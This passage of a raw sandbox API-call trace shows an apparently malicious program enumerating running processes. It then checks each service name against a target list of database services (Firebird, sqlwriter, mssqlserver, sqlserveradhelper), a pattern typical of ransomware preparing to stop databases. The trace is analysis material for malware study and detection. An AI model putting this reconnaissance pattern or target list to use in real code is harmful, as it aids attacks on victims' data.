th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.077] lstrlenW (lpString="svchost.exe") returned 11 [0056.077] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.078] lstrlenW (lpString="svchost.exe") returned 11 [0056.078] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.078] lstrlenW (lpString="svchost.exe") returned 11 [0056.078] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.079] lstrlenW (lpString="svchost.exe") returned 11 [0056.079] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x26, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.080] lstrlenW (lpString="svchost.exe") returned 11 [0056.080] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.080] lstrlenW (lpString="svchost.exe") returned 11 [0056.080] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.081] lstrlenW (lpString="svchost.exe") returned 11 [0056.081] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.082] lstrlenW (lpString="svchost.exe") returned 11 [0056.082] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.082] lstrlenW (lpString="svchost.exe") returned 11 [0056.082] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0056.083] lstrlenW (lpString="spoolsv.exe") returned 11 [0056.083] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.084] lstrlenW (lpString="svchost.exe") returned 11 [0056.084] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.084] lstrlenW (lpString="svchost.exe") returned 11 [0056.085] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0056.085] lstrlenW (lpString="audiodg.exe") returned 11 [0056.085] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0056.086] lstrlenW (lpString="sihost.exe") returned 10 [0056.086] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.087] lstrlenW (lpString="svchost.exe") returned 11 [0056.087] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.087] lstrlenW (lpString="taskhostw.exe") returned 13 [0056.087] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0056.088] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0056.088] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0056.089] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0056.089] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3b, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0056.089] lstrlenW (lpString="explorer.exe") returned 12 [0056.089] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0056.090] lstrlenW (lpString="Memory Compression") returned 18 [0056.091] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0056.091] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0056.091] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0056.092] lstrlenW (lpString="SearchUI.exe") returned 12 [0056.092] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0056.093] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0056.093] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0056.093] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0056.093] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.094] lstrlenW (lpString="taskhostw.exe") returned 13 [0056.094] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0056.095] lstrlenW (lpString="UsoClient.exe") returned 13 [0056.095] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0056.095] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0056.095] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0056.096] lstrlenW (lpString="taskhostw.exe") returned 13 [0056.096] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0056.097] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0056.097] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0056.097] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0056.098] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0056.098] lstrlenW (lpString="msoia.exe") returned 9 [0056.098] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0056.099] lstrlenW (lpString="msoia.exe") returned 9 [0056.099] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0056.100] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0056.100] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0056.100] lstrlenW (lpString="screensaver.exe") returned 15 [0056.100] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0056.101] lstrlenW (lpString="xml upper.exe") returned 13 [0056.101] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0056.102] lstrlenW (lpString="defeat preston.exe") returned 18 [0056.102] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0056.102] lstrlenW (lpString="boss isolated.exe") returned 17 [0056.102] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0056.103] lstrlenW (lpString="member.exe") returned 10 [0056.103] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0056.104] lstrlenW (lpString="chubby-er.exe") returned 13 [0056.104] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0056.104] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0056.104] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0056.105] lstrlenW (lpString="organization.exe") returned 16 [0056.105] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0056.291] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0056.291] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0056.292] lstrlenW (lpString="spray-roman.exe") returned 15 [0056.292] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0056.293] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0056.293] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0056.294] lstrlenW (lpString="tank attacks.exe") returned 16 [0056.294] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0056.295] lstrlenW (lpString="wires jacket.exe") returned 16 [0056.295] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0056.296] lstrlenW (lpString="values.exe") returned 10 [0056.296] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0056.297] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0056.297] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0056.298] lstrlenW (lpString="printersaerospace.exe") returned 21 [0056.298] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0056.300] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0056.300] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0056.301] lstrlenW (lpString="dllhost.exe") returned 11 [0056.301] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0056.302] lstrlenW (lpString="joke.exe") returned 8 [0056.302] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0056.303] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0056.303] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0056.304] lstrlenW (lpString="documents.exe") returned 13 [0056.304] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0056.305] lstrlenW (lpString="rebel.exe") returned 9 [0056.305] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0056.306] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0056.306] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.307] lstrlenW (lpString="conhost.exe") returned 11 [0056.307] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.308] lstrlenW (lpString="conhost.exe") returned 11 [0056.308] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0056.309] lstrlenW (lpString="hgaibc.exe") returned 10 [0056.309] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0056.310] lstrlenW (lpString="cmd.exe") returned 7 [0056.310] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0056.311] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0056.311] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.312] lstrlenW (lpString="conhost.exe") returned 11 [0056.312] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0056.313] lstrlenW (lpString="conhost.exe") returned 11 [0056.313] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0056.313] lstrlenW (lpString="svchost.exe") returned 11 [0056.314] Process32NextW (in: hSnapshot=0x334, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0056.314] CloseHandle (hObject=0x334) returned 1 [0056.314] Sleep (dwMilliseconds=0x1f4) [0057.638] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ecf0 [0057.638] EnumServicesStatusExW (in: hSCManager=0x60ecf0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0057.639] GetLastError () returned 0xea [0057.639] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1ce8) returned 0x6c0978 [0057.639] EnumServicesStatusExW (in: hSCManager=0x60ecf0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x6c0978, cbBufSize=0x1ce8, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x6c0978, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0057.640] CloseServiceHandle (hSCObject=0x60ecf0) returned 1 [0057.640] lstrlenW (lpString="Appinfo") returned 7 [0057.640] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0057.640] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0057.640] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0057.640] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0057.640] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0057.640] lstrlenW (lpString="AppXSvc") returned 7 [0057.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0057.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0057.641] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0057.641] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0057.641] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0057.641] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0057.641] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0057.641] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0057.641] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 